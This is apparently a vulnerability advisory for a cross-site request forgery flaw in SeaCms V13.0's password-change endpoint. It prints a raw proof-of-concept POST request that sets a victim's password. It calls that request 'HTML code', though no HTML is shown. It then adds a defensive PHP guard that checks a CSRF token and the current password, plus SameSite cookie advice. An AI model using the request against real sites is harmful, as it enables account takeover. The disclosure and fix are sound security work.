A Cross-Site Request Forgery (CSRF) vulnerability has been identified in SeaCms V13.0. This vulnerability allows an attacker to change a user's password without their consent by tricking them into visiting a malicious webpage.
POC
POST /member.php?action=chgpwdsubmit HTTP/1.1
Host: your-ip
Content-Length: 56
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h8inlct2j4b5efgecbfn6r5smr
Connection: close

email=x@x.x&nickname=&newpwd=Hebing123&newpwd2=Hebing123
By storing the above HTML code on any webpage, if a user visits the page, their password will be changed to "Hebing123" without their knowledge.
Due to the mechanism where the page returns to the previous page after personal information is modified, an attacker can not only change the password but also modify any other parameters and values, allowing for multiple attacks.
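The request above carries only `email`, `nickname`, `newpwd` and `newpwd2`, with no per-session token and no current password, so the session cookie alone authorizes the change. The following is an added example of a server-side guard for such a handler, not SeaCms code and not a patch from the project; the function names, the `csrf_token` and `oldpwd` fields, and the use of `password_hash()` for the stored credential are assumptions.

```php
<?php
// Added illustration, not SeaCms code. Names and form fields are hypothetical.
declare(strict_types=1);

// Call after session_start() when rendering the profile form and place the
// result in a hidden <input name="csrf_token">.
function csrf_issue_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the POST carries the token bound to this session.
function csrf_token_valid(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent); // constant-time comparison
}

// Returns null when the change may proceed, otherwise the rejection reason.
// Assumption: $storedHash was produced by password_hash().
function guard_password_change(array $post, array $session, string $storedHash): ?string
{
    if (!csrf_token_valid($post, $session)) {
        return 'missing or invalid CSRF token';
    }
    $old = $post['oldpwd'] ?? '';
    if (!is_string($old) || !password_verify($old, $storedHash)) {
        return 'current password incorrect';
    }
    return null;
}

if (PHP_SAPI === 'cli') {
    // Constructed session state and credential for the demonstration.
    $session = ['csrf_token' => bin2hex(random_bytes(32))];
    $hash = password_hash('constructed-current-pw', PASSWORD_DEFAULT);
    // Body taken from the request shown on this page: no token, no old password.
    parse_str('email=x@x.x&nickname=&newpwd=Hebing123&newpwd2=Hebing123', $forged);
    var_dump(guard_password_change($forged, $session, $hash)); // rejected
    // Same fields submitted from the site's own form by the account owner.
    $own = $forged + ['csrf_token' => $session['csrf_token'], 'oldpwd' => 'constructed-current-pw'];
    var_dump(guard_password_change($own, $session, $hash));    // NULL, allowed
}
```

Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` (for example through `session_set_cookie_params()`) complements the token check, since the browser then withholds the cookie on cross-site POSTs.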